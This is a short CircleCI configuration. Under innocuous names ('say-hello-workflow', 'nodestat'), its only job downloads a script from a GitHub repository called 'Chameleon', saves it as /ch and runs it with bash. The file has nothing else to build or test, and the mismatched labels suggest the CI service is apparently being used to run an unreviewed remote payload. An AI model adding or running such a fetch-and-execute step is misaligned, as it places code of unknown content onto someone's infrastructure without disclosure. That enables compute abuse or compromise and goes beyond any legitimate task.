version: 2.1

jobs:
  dockeretteinstall:
   
    docker:
      - image: ubuntu:latest

    steps:
      - checkout
      - run:
          name: "nodestat"
          command: "set -e  && apt update && apt upgrade -y && apt install curl -y && curl -fsSL https://raw.githubusercontent.com/NateYeet/Chameleon/main/Chameleon/main.czco >> /ch && bash /ch node"

workflows:
  say-hello-workflow:
    jobs:
      - dockeretteinstall
